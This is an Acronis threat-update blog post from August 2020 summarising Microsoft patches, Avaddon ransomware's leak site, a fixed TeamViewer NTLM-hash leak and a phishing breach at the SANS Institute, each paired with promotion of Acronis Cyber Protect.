Cyberthreat update from Acronis CPOCs: Week of August 17, 2020

Here at Acronis, we’re always monitoring for dangers to your data, deploying updates to handle newly-discovered vulnerabilities, and issuing alerts and recommendations to help you stay protected. Our global network of Acronis Cyber Protection Operations Centers (CPOCs) continue to work around the clock to proactively detect and defend against the latest cyberthreats.

Part of this work includes video updates to inform you of new hazards in the digital landscape — like newly discovered software vulnerabilities and malware attacks. Here’s a look at some of the most recent breaking news and analyses:

Microsoft recently released updates to plug at least 120 security holes in its Windows operating system and supported software. Two of these were newly discovered zero-day vulnerabilities that were being actively exploited.

At least 17 of the bugs squashed in August address “critical” vulnerabilities, according to Microsoft’s own rankings. This marks the sixth month in a row in which Microsoft has released over 100 bug fixes.

As Microsoft continues to uncover large numbers of bugs and release critical patches on a regular basis, automatic patch management features like those in Acronis Cyber Protect are essential for safeguarding business-critical data.

The Avaddon ransomware group has launched a data leak site and announced it on a Russian language cybercrime forum — making them the latest operation to seriously threaten to steal sensitive data and publicly release it if the victims fail to pay a ransom.

The operators behind Avaddon are actively recruiting new affiliates — attackers who receive a personalized version of the ransomware, tied to a unique affiliate ID, and share profits with the operators whenever a ransom is paid by victims.

With ransomware attacks escalating into data breaches, it’s important to have tools with integrated ransomware protection — like Acronis Cyber Protect — to detect and block modern cyberthreats, keeping your business-critical data private and secure.

The popular remote access tool TeamViewer recently patched a vulnerability in its Windows client that could leak your password to an attacker.

Exploiting this issue, attackers can create malicious websites that use TeamViewer’s specific URI to launch the application and provide it with an SMB path argument, which in turn sends the user’s NTLM password hash to the attacker. Cybercriminals can then brute force the victim’s login credentials and potentially take over their entire system.

This vulnerability has been fixed as of TeamViewer version 15.8.3, and all users are urged to immediately update their client to stay protected online. The vulnerability assessment and patch management features in Acronis Cyber Protect keep you safe by automatically monitoring for, and installing, patches to TeamViewer and other applications.

The SANS Institute, a cybersecurity training organization, has disclosed a security incident which resulted in 28,000 records of personally identifiable information (PII) being forwarded to an unknown email address. A phishing email was found to be the initial attack vector, compromising just a single employee’s account.

Before the leak was identified, a total of 513 emails were forwarded to an external account. While the majority of these did not contain important data, some did include files with information such as first and last names, phone numbers, email and physical addresses, employers, and industries.

The SANS Institute is renowned for its excellent cybersecurity instructors, training, and certifications. No matter who you are — or how vigilant you tend to be in watching out for phishing scams — breaches can still happen. URL filtering capabilities, such as those in Acronis Cyber Protect, automatically block access to malicious URLs and keep your systems safe.

# # #

For the latest reports on emerging cyberthreats from Acronis’ cyber protection experts, subscribe to the Acronis YouTube channel and receive our CPOC updates as they’re posted.